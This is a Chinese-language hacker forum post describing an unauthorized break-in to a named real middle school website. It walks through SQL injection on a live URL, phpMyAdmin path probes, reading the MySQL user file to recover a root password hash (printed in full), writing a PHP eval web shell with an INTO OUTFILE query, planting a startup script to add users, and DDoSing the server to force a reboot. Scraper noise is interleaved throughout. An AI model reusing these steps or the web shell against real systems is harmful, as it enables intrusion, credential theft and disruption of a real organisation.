友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
2 `- C! q" J' v" `6 x发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！


# c: g: i, ?) a. b8 S/ t
* K& w' Q0 A$ H1 E常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
. h4 [/ X2 n2 w# {2 r3 a
那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

6 W- w. y8 F# N+ e3 O试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
( g7 }, z: [( l2./phpMyAdmin/phpinfo.php  
# _" ]0 ^$ J. M3 X- t3./load_file()  
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
' m+ p. S* U/ T! v5 f  _% Y2 V6 [5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  

均不行...........................

御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败
& x6 O% }5 L8 c( |$ Z7 {% q' X& b
敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
% d0 L2 f! P6 @) I' T* o
8 K9 e- x+ [* ?# s% b想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
" ?+ ?& Z% u& b6 V4 c
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
& [  [/ d  `" [/ Y: A' y2 K  k) }5 R3 f
( f0 `/ m2 |' b5 O" l/ `# f/ B自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

& Y. U' p/ `7 d2 }$ [2 h: G成功读到root密码：
/ A  m3 J6 b( A5 r: l3 T) G: \
17---- r(0072)
18---- o(006f)
19---- o(006f)
20---- t(0074)
21---- *(002a)
22---- 8(0038)
& h* S5 z! t  v5 P: {5 T23---- 2(0032)
24---- E(0045)
/ g: ?/ Y# q: B/ [! Z1 w25---- 1(0031)
: `3 w  c! y7 q/ \; M! `; a/ w% F- |26---- C(0043)
27---- 5(0035)
28---- 8(0038)
29---- 2(0032)
, L5 m( V) A- m7 }30---- 8(0038)
1 z$ I0 b" D. q; p9 V6 D& H31---- A(0041)
32---- 9(0039)
/ d/ G% p7 V# R6 v- D! |/ {33---- B(0042)
34---- 5(0035)
! ^5 Y& A0 b" f5 ^' h2 ^' x( x5 ~35---- 4(0034)
& p* P, A3 Y3 v5 W36---- 8(0038)
37---- 6(0036)
38---- 4(0034)
+ s/ t& P! o/ Q39---- 9(0039)
% ^4 ?; J4 _7 Z  s3 Z: E) s  j40---- 1(0031)
6 B& X4 r+ S# r  g41---- 1(0031)
  o, H8 A% S- n1 `4 F0 V42---- 5(0035)
43---- 3(0033)
3 c7 O# ^# ]; l2 B& _& ^- Z* c44---- 5(0035)
45---- 9(0039)
46---- 8(0038)
47---- F(0046)
48---- F(0046)
7 F( A1 n& J* Z0 _1 _49---- 4(0034)
50---- F(0046)
! Q2 V/ E( _3 ]/ v9 m7 ]0 _1 A51---- 0(0030)
* C! ]/ w  P; j8 u' ~3 ^: Q52---- 3(0033)
53---- 2(0032)
$ H2 m  ^$ ?8 l: i54---- A(0041)
55---- 4(0034)
/ ]! w+ n5 R- ^! f& h  @& w56---- A(0041)
% f9 B' _5 a9 g# Q, D57---- B(0042)
0 r/ a$ k1 p1 Y" ^" q2 S58---- *(0044)
59---- *(0035)
4 B4 f6 {* K8 W4 K# S( M60---- *(0041)
61---- *0032)
* v9 ]  T. ~! K3 `$ U. R+ {; t
) s' E" q; J7 d9 W# N解密后成功登陆phpmyamin
                          
/ U3 g/ C/ S: |2 C6 b
                             
+ X9 J4 D8 _5 K& h3 B
0 h% @9 y" J( H找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

成功执行，拿下shell，菜刀连接：
. r7 z- y! s) w/ q1 F
  t" Y2 K2 b) p  A# h服务器不支持asp,aspx,php提权无果...................

7 R2 W3 k. a$ e+ l但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

" W8 _% v6 a9 x! ~# b

别名     administrators
  @8 ?$ J  z/ q注释     管理员对计算机/域有不受限制的完全访问权

7 T# V& W4 e$ ]5 m

成员

-------------------------------------------------------------------------------
, q3 `4 o5 A" o! N( Z. Y1 m5 ^admin
Administrator
$ t, N* D( L! E9 v0 B) tslipper$
; ~+ H- ?# h' S# Osqluser
/ R1 n# O4 p2 P4 _  u- w/ c命令成功完成。

服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
' ~$ L& H- H7 v  y' W# N" W
ddos服务器重启，不然就只能坐等服务器重启了...............................

) a+ G9 k- b4 E7 T& M      

angel